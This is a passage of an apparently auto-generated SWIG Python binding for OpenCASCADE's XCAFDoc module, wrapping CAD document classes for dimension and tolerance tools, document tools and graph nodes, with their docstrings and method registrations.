:param DatumL:
:type DatumL: TDF_Label &
:param aName:
:type aName: Handle_TCollection_HAsciiString &
:param aDescription:
:type aDescription: Handle_TCollection_HAsciiString &
:param anIdentification:
:type anIdentification: Handle_TCollection_HAsciiString &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_GetDatum(self, *args)
def GetDatumTolerLabels(self, *args):
"""
* Returns all Datum labels defined for label DimTolL
:param DimTolL:
:type DimTolL: TDF_Label &
:param Datums:
:type Datums: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_GetDatumTolerLabels(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_DimTolTool self)"""
return _XCAFDoc.XCAFDoc_DimTolTool__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_DimTolTool self) -> Handle_XCAFDoc_DimTolTool"""
return _XCAFDoc.XCAFDoc_DimTolTool_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_DimTolTool.BaseLabel = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_BaseLabel,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.ShapeTool = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_ShapeTool,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.IsDimTol = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_IsDimTol,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetDimTolLabels = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetDimTolLabels,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.FindDimTol = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_FindDimTol,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.AddDimTol = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_AddDimTol,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.SetDimTol = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_SetDimTol,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetRefShapeLabel = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetRefShapeLabel,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetRefDGTLabels = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetRefDGTLabels,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetDimTol = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetDimTol,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.IsDatum = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_IsDatum,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetDatumLabels = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetDatumLabels,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.FindDatum = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_FindDatum,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.AddDatum = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_AddDatum,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.SetDatum = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_SetDatum,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetDatum = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetDatum,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetDatumTolerLabels = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetDatumTolerLabels,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool__kill_pointed,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetHandle,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool_swigregister = _XCAFDoc.XCAFDoc_DimTolTool_swigregister
XCAFDoc_DimTolTool_swigregister(XCAFDoc_DimTolTool)
def XCAFDoc_DimTolTool_Set(*args):
"""
* Creates (if not exist) DimTolTool.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_DimTolTool
"""
return _XCAFDoc.XCAFDoc_DimTolTool_Set(*args)
def XCAFDoc_DimTolTool_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_DimTolTool_GetID(*args)
class Handle_XCAFDoc_DimTolTool(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_DimTolTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_DimTolTool(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_DimTolTool_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_DimTolTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTolTool_Nullify,None,Handle_XCAFDoc_DimTolTool)
Handle_XCAFDoc_DimTolTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTolTool_IsNull,None,Handle_XCAFDoc_DimTolTool)
Handle_XCAFDoc_DimTolTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTolTool_GetObject,None,Handle_XCAFDoc_DimTolTool)
Handle_XCAFDoc_DimTolTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTolTool__kill_pointed,None,Handle_XCAFDoc_DimTolTool)
Handle_XCAFDoc_DimTolTool_swigregister = _XCAFDoc.Handle_XCAFDoc_DimTolTool_swigregister
Handle_XCAFDoc_DimTolTool_swigregister(Handle_XCAFDoc_DimTolTool)
def Handle_XCAFDoc_DimTolTool_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_DimTolTool_DownCast(*args)
Handle_XCAFDoc_DimTolTool_DownCast = _XCAFDoc.Handle_XCAFDoc_DimTolTool_DownCast
class XCAFDoc_DocumentTool(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_DocumentTool_GetID(*args)
GetID = staticmethod(GetID)
def Set(*args):
"""
* Create (if not exist) DocumentTool attribute on 0.1 label if <IsAcces> is true, else on <L> label. This label will be returned by DocLabel(); If the attribute is already set it won't be reset on <L> even if <IsAcces> is false. ColorTool and ShapeTool attributes are also set by this method.
:param L:
:type L: TDF_Label &
:param IsAcces: default value is Standard_True
:type IsAcces: bool
:rtype: Handle_XCAFDoc_DocumentTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_Set(*args)
Set = staticmethod(Set)
def IsXCAFDocument(*args):
"""
:param Doc:
:type Doc: Handle_TDocStd_Document &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_IsXCAFDocument(*args)
IsXCAFDocument = staticmethod(IsXCAFDocument)
def DocLabel(*args):
"""
* Returns label where the DocumentTool attribute is or 0.1 if DocumentTool is not yet set.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_DocLabel(*args)
DocLabel = staticmethod(DocLabel)
def ShapesLabel(*args):
"""
* Returns sub-label of DocLabel() with tag 1.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_ShapesLabel(*args)
ShapesLabel = staticmethod(ShapesLabel)
def ColorsLabel(*args):
"""
* Returns sub-label of DocLabel() with tag 2.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_ColorsLabel(*args)
ColorsLabel = staticmethod(ColorsLabel)
def LayersLabel(*args):
"""
* Returns sub-label of DocLabel() with tag 3.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_LayersLabel(*args)
LayersLabel = staticmethod(LayersLabel)
def DGTsLabel(*args):
"""
* Returns sub-label of DocLabel() with tag 4.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_DGTsLabel(*args)
DGTsLabel = staticmethod(DGTsLabel)
def MaterialsLabel(*args):
"""
* Returns sub-label of DocLabel() with tag 5.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_MaterialsLabel(*args)
MaterialsLabel = staticmethod(MaterialsLabel)
def ShapeTool(*args):
"""
* Creates (if it does not exist) ShapeTool attribute on ShapesLabel().
:param acces:
:type acces: TDF_Label &
:rtype: Handle_XCAFDoc_ShapeTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_ShapeTool(*args)
ShapeTool = staticmethod(ShapeTool)
def ColorTool(*args):
"""
* Creates (if it does not exist) ColorTool attribute on ColorsLabel().
:param acces:
:type acces: TDF_Label &
:rtype: Handle_XCAFDoc_ColorTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_ColorTool(*args)
ColorTool = staticmethod(ColorTool)
def LayerTool(*args):
"""
* Creates (if it does not exist) LayerTool attribute on LayersLabel().
:param acces:
:type acces: TDF_Label &
:rtype: Handle_XCAFDoc_LayerTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_LayerTool(*args)
LayerTool = staticmethod(LayerTool)
def DimTolTool(*args):
"""
* Creates (if it does not exist) DimTolTool attribute on DGTsLabel().
:param acces:
:type acces: TDF_Label &
:rtype: Handle_XCAFDoc_DimTolTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_DimTolTool(*args)
DimTolTool = staticmethod(DimTolTool)
def MaterialTool(*args):
"""
* Creates (if it does not exist) DimTolTool attribute on DGTsLabel().
:param acces:
:type acces: TDF_Label &
:rtype: Handle_XCAFDoc_MaterialTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_MaterialTool(*args)
MaterialTool = staticmethod(MaterialTool)
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_DocumentTool_swiginit(self,_XCAFDoc.new_XCAFDoc_DocumentTool(*args))
def Init(self, *args):
"""
* to be called when reading this attribute from file
:rtype: None
"""
return _XCAFDoc.XCAFDoc_DocumentTool_Init(self, *args)
def Destroy(self, *args):
"""
* Unregisters the document holding this attribute from an internal global map of XDE documents.
:rtype: void
"""
return _XCAFDoc.XCAFDoc_DocumentTool_Destroy(self, *args)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_DocumentTool self)"""
return _XCAFDoc.XCAFDoc_DocumentTool__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_DocumentTool self) -> Handle_XCAFDoc_DocumentTool"""
return _XCAFDoc.XCAFDoc_DocumentTool_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_DocumentTool.Init = new_instancemethod(_XCAFDoc.XCAFDoc_DocumentTool_Init,None,XCAFDoc_DocumentTool)
XCAFDoc_DocumentTool.Destroy = new_instancemethod(_XCAFDoc.XCAFDoc_DocumentTool_Destroy,None,XCAFDoc_DocumentTool)
XCAFDoc_DocumentTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DocumentTool__kill_pointed,None,XCAFDoc_DocumentTool)
XCAFDoc_DocumentTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_DocumentTool_GetHandle,None,XCAFDoc_DocumentTool)
XCAFDoc_DocumentTool_swigregister = _XCAFDoc.XCAFDoc_DocumentTool_swigregister
XCAFDoc_DocumentTool_swigregister(XCAFDoc_DocumentTool)
def XCAFDoc_DocumentTool_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_DocumentTool_GetID(*args)
def XCAFDoc_DocumentTool_Set(*args):
"""
* Create (if not exist) DocumentTool attribute on 0.1 label if <IsAcces> is true, else on <L> label. This label will be returned by DocLabel(); If the attribute is already set it won't be reset on <L> even if <IsAcces> is false. ColorTool and ShapeTool attributes are also set by this method.
:param L:
:type L: TDF_Label &
:param IsAcces: default value is Standard_True
:type IsAcces: bool
:rtype: Handle_XCAFDoc_DocumentTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_Set(*args)
def XCAFDoc_DocumentTool_IsXCAFDocument(*args):
"""
:param Doc:
:type Doc: Handle_TDocStd_Document &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_IsXCAFDocument(*args)
def XCAFDoc_DocumentTool_DocLabel(*args):
"""
* Returns label where the DocumentTool attribute is or 0.1 if DocumentTool is not yet set.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_DocLabel(*args)
def XCAFDoc_DocumentTool_ShapesLabel(*args):
"""
* Returns sub-label of DocLabel() with tag 1.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_ShapesLabel(*args)
def XCAFDoc_DocumentTool_ColorsLabel(*args):
"""
* Returns sub-label of DocLabel() with tag 2.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_ColorsLabel(*args)
def XCAFDoc_DocumentTool_LayersLabel(*args):
"""
* Returns sub-label of DocLabel() with tag 3.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_LayersLabel(*args)
def XCAFDoc_DocumentTool_DGTsLabel(*args):
"""
* Returns sub-label of DocLabel() with tag 4.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_DGTsLabel(*args)
def XCAFDoc_DocumentTool_MaterialsLabel(*args):
"""
* Returns sub-label of DocLabel() with tag 5.
:param acces:
:type acces: TDF_Label &
:rtype: TDF_Label
"""
return _XCAFDoc.XCAFDoc_DocumentTool_MaterialsLabel(*args)
def XCAFDoc_DocumentTool_ShapeTool(*args):
"""
* Creates (if it does not exist) ShapeTool attribute on ShapesLabel().
:param acces:
:type acces: TDF_Label &
:rtype: Handle_XCAFDoc_ShapeTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_ShapeTool(*args)
def XCAFDoc_DocumentTool_ColorTool(*args):
"""
* Creates (if it does not exist) ColorTool attribute on ColorsLabel().
:param acces:
:type acces: TDF_Label &
:rtype: Handle_XCAFDoc_ColorTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_ColorTool(*args)
def XCAFDoc_DocumentTool_LayerTool(*args):
"""
* Creates (if it does not exist) LayerTool attribute on LayersLabel().
:param acces:
:type acces: TDF_Label &
:rtype: Handle_XCAFDoc_LayerTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_LayerTool(*args)
def XCAFDoc_DocumentTool_DimTolTool(*args):
"""
* Creates (if it does not exist) DimTolTool attribute on DGTsLabel().
:param acces:
:type acces: TDF_Label &
:rtype: Handle_XCAFDoc_DimTolTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_DimTolTool(*args)
def XCAFDoc_DocumentTool_MaterialTool(*args):
"""
* Creates (if it does not exist) DimTolTool attribute on DGTsLabel().
:param acces:
:type acces: TDF_Label &
:rtype: Handle_XCAFDoc_MaterialTool
"""
return _XCAFDoc.XCAFDoc_DocumentTool_MaterialTool(*args)
class Handle_XCAFDoc_DocumentTool(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_DocumentTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_DocumentTool(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_DocumentTool_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_DocumentTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DocumentTool_Nullify,None,Handle_XCAFDoc_DocumentTool)
Handle_XCAFDoc_DocumentTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DocumentTool_IsNull,None,Handle_XCAFDoc_DocumentTool)
Handle_XCAFDoc_DocumentTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DocumentTool_GetObject,None,Handle_XCAFDoc_DocumentTool)
Handle_XCAFDoc_DocumentTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DocumentTool__kill_pointed,None,Handle_XCAFDoc_DocumentTool)
Handle_XCAFDoc_DocumentTool_swigregister = _XCAFDoc.Handle_XCAFDoc_DocumentTool_swigregister
Handle_XCAFDoc_DocumentTool_swigregister(Handle_XCAFDoc_DocumentTool)
def Handle_XCAFDoc_DocumentTool_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_DocumentTool_DownCast(*args)
Handle_XCAFDoc_DocumentTool_DownCast = _XCAFDoc.Handle_XCAFDoc_DocumentTool_DownCast
class XCAFDoc_GraphNode(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def Find(*args):
"""
* class methods working on the node =================================== Shortcut to search a Graph node attribute with default GraphID. Returns true if found.
:param L:
:type L: TDF_Label &
:param G:
:type G: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_GraphNode_Find(*args)
Find = staticmethod(Find)
def Set(*args):
"""
* Finds or Creates a GraphNode attribute on the label <L> with the default Graph ID, returned by the method <GetDefaultGraphID>. Returns the created/found GraphNode attribute.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_GraphNode
* Finds or Creates a GraphNode attribute on the label <L>, with an explicit tree ID. <ExplicitGraphID> is the ID returned by <TDF_Attribute::ID> method. Returns the found/created GraphNode attribute.
:param L:
:type L: TDF_Label &
:param ExplicitGraphID:
:type ExplicitGraphID: Standard_GUID &
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_GraphNode_Set(*args)
Set = staticmethod(Set)
def GetDefaultGraphID(*args):
"""
* returns a default Graph ID. this ID is used by the <Set> method without explicit tree ID. Instance methods: ================
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_GraphNode_GetDefaultGraphID(*args)
GetDefaultGraphID = staticmethod(GetDefaultGraphID)
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_GraphNode_swiginit(self,_XCAFDoc.new_XCAFDoc_GraphNode(*args))
def SetGraphID(self, *args):
"""
:param explicitID:
:type explicitID: Standard_GUID &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNode_SetGraphID(self, *args)
def SetFather(self, *args):
"""
* Set GraphNode <F> as father of me and returns index of <F> in Sequence that containing Fathers GraphNodes. return index of <F> from GraphNodeSequnece
:param F:
:type F: Handle_XCAFDoc_GraphNode &
:rtype: int
"""
return _XCAFDoc.XCAFDoc_GraphNode_SetFather(self, *args)
def SetChild(self, *args):
"""
* Set GraphNode <Ch> as child of me and returns index of <Ch> in Sequence that containing Children GraphNodes. return index of <Ch> from GraphNodeSequnece
:param Ch:
:type Ch: Handle_XCAFDoc_GraphNode &
:rtype: int
"""
return _XCAFDoc.XCAFDoc_GraphNode_SetChild(self, *args)
def UnSetFather(self, *args):
"""
* Remove <F> from Fathers GraphNodeSequence. and remove link between father and child.
:param F:
:type F: Handle_XCAFDoc_GraphNode &
:rtype: None
* Remove Father GraphNode by index from Fathers GraphNodeSequence. and remove link between father and child.
:param Findex:
:type Findex: int
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNode_UnSetFather(self, *args)
def UnSetChild(self, *args):
"""
* Remove <Ch> from GraphNodeSequence. and remove link between father and child.
:param Ch:
:type Ch: Handle_XCAFDoc_GraphNode &
:rtype: None
* Remove Child GraphNode by index from Children GraphNodeSequence. and remove link between father and child.
:param Chindex:
:type Chindex: int
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNode_UnSetChild(self, *args)
def GetFather(self, *args):
"""
* Return GraphNode by index from GraphNodeSequence.
:param Findex:
:type Findex: int
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_GraphNode_GetFather(self, *args)
def GetChild(self, *args):
"""
* Return GraphNode by index from GraphNodeSequence.
:param Chindex:
:type Chindex: int
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_GraphNode_GetChild(self, *args)
def FatherIndex(self, *args):
"""
* Return index of <F>, or zero if there is no such Graphnode.
:param F:
:type F: Handle_XCAFDoc_GraphNode &
:rtype: int
"""
return _XCAFDoc.XCAFDoc_GraphNode_FatherIndex(self, *args)
def ChildIndex(self, *args):
"""
* Return index of <Ch>, or zero if there is no such Graphnode.
:param Ch:
:type Ch: Handle_XCAFDoc_GraphNode &
:rtype: int
"""
return _XCAFDoc.XCAFDoc_GraphNode_ChildIndex(self, *args)
def IsFather(self, *args):
"""
* returns True if <self> is father of <Ch>.
:param Ch:
:type Ch: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_GraphNode_IsFather(self, *args)
def IsChild(self, *args):
"""
* returns True if <self> is child of <F>.
:param F:
:type F: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_GraphNode_IsChild(self, *args)
def NbFathers(self, *args):
"""
* return Number of Fathers GraphNodes.
:rtype: int
"""
return _XCAFDoc.XCAFDoc_GraphNode_NbFathers(self, *args)
def NbChildren(self, *args):
"""
* return Number of Childrens GraphNodes. Implementation of Attribute methods: ===================================
:rtype: int
"""
return _XCAFDoc.XCAFDoc_GraphNode_NbChildren(self, *args)
def DumpToString(self):
"""DumpToString(XCAFDoc_GraphNode self) -> std::string"""
return _XCAFDoc.XCAFDoc_GraphNode_DumpToString(self)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_GraphNode self)"""
return _XCAFDoc.XCAFDoc_GraphNode__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_GraphNode self) -> Handle_XCAFDoc_GraphNode"""
return _XCAFDoc.XCAFDoc_GraphNode_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_GraphNode.SetGraphID = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_SetGraphID,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.SetFather = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_SetFather,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.SetChild = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_SetChild,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.UnSetFather = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_UnSetFather,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.UnSetChild = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_UnSetChild,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.GetFather = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_GetFather,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.GetChild = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_GetChild,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.FatherIndex = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_FatherIndex,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.ChildIndex = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_ChildIndex,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.IsFather = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_IsFather,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.IsChild = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_IsChild,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.NbFathers = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_NbFathers,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.NbChildren = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_NbChildren,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.DumpToString = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_DumpToString,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode__kill_pointed,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_GetHandle,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode_swigregister = _XCAFDoc.XCAFDoc_GraphNode_swigregister
XCAFDoc_GraphNode_swigregister(XCAFDoc_GraphNode)
def XCAFDoc_GraphNode_Find(*args):
"""
* class methods working on the node =================================== Shortcut to search a Graph node attribute with default GraphID. Returns true if found.
:param L:
:type L: TDF_Label &
:param G:
:type G: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_GraphNode_Find(*args)
def XCAFDoc_GraphNode_Set(*args):
"""
* Finds or Creates a GraphNode attribute on the label <L> with the default Graph ID, returned by the method <GetDefaultGraphID>. Returns the created/found GraphNode attribute.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_GraphNode
* Finds or Creates a GraphNode attribute on the label <L>, with an explicit tree ID. <ExplicitGraphID> is the ID returned by <TDF_Attribute::ID> method. Returns the found/created GraphNode attribute.
:param L:
:type L: TDF_Label &
:param ExplicitGraphID:
:type ExplicitGraphID: Standard_GUID &
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_GraphNode_Set(*args)
def XCAFDoc_GraphNode_GetDefaultGraphID(*args):
"""
* returns a default Graph ID. this ID is used by the <Set> method without explicit tree ID. Instance methods: ================
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_GraphNode_GetDefaultGraphID(*args)
class Handle_XCAFDoc_GraphNode(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_GraphNode_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_GraphNode(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_GraphNode_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_GraphNode.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_GraphNode_Nullify,None,Handle_XCAFDoc_GraphNode)
Handle_XCAFDoc_GraphNode.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_GraphNode_IsNull,None,Handle_XCAFDoc_GraphNode)
Handle_XCAFDoc_GraphNode.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_GraphNode_GetObject,None,Handle_XCAFDoc_GraphNode)
Handle_XCAFDoc_GraphNode._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_GraphNode__kill_pointed,None,Handle_XCAFDoc_GraphNode)
Handle_XCAFDoc_GraphNode_swigregister = _XCAFDoc.Handle_XCAFDoc_GraphNode_swigregister
Handle_XCAFDoc_GraphNode_swigregister(Handle_XCAFDoc_GraphNode)
def Handle_XCAFDoc_GraphNode_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_GraphNode_DownCast(*args)
Handle_XCAFDoc_GraphNode_DownCast = _XCAFDoc.Handle_XCAFDoc_GraphNode_DownCast
class XCAFDoc_GraphNodeSequence(OCC.TCollection.TCollection_BaseSequence):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
"""
_XCAFDoc.XCAFDoc_GraphNodeSequence_swiginit(self,_XCAFDoc.new_XCAFDoc_GraphNodeSequence(*args))
def Clear(self, *args):
"""
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_Clear(self, *args)
def Assign(self, *args):
"""
:param Other:
:type Other: XCAFDoc_GraphNodeSequence &
:rtype: XCAFDoc_GraphNodeSequence
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_Assign(self, *args)
def Set(self, *args):
"""
:param Other:
:type Other: XCAFDoc_GraphNodeSequence &
:rtype: XCAFDoc_GraphNodeSequence
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_Set(self, *args)
def Append(self, *args):
"""
:param T:
:type T: Handle_XCAFDoc_GraphNode &
:rtype: None
:param S:
:type S: XCAFDoc_GraphNodeSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_Append(self, *args)
def Prepend(self, *args):
"""
:param T:
:type T: Handle_XCAFDoc_GraphNode &
:rtype: None
:param S:
:type S: XCAFDoc_GraphNodeSequence &
:rtype: None
"""
return _XCAFDoc.XCAFDoc_GraphNodeSequence_Prepend(self, *args)
def InsertBefore(self, *args):
"""
:param Index:
:type Index: int
:param T:
:type T: Handle_XCAFDoc_GraphNode &
:rtype: None
:param Index:
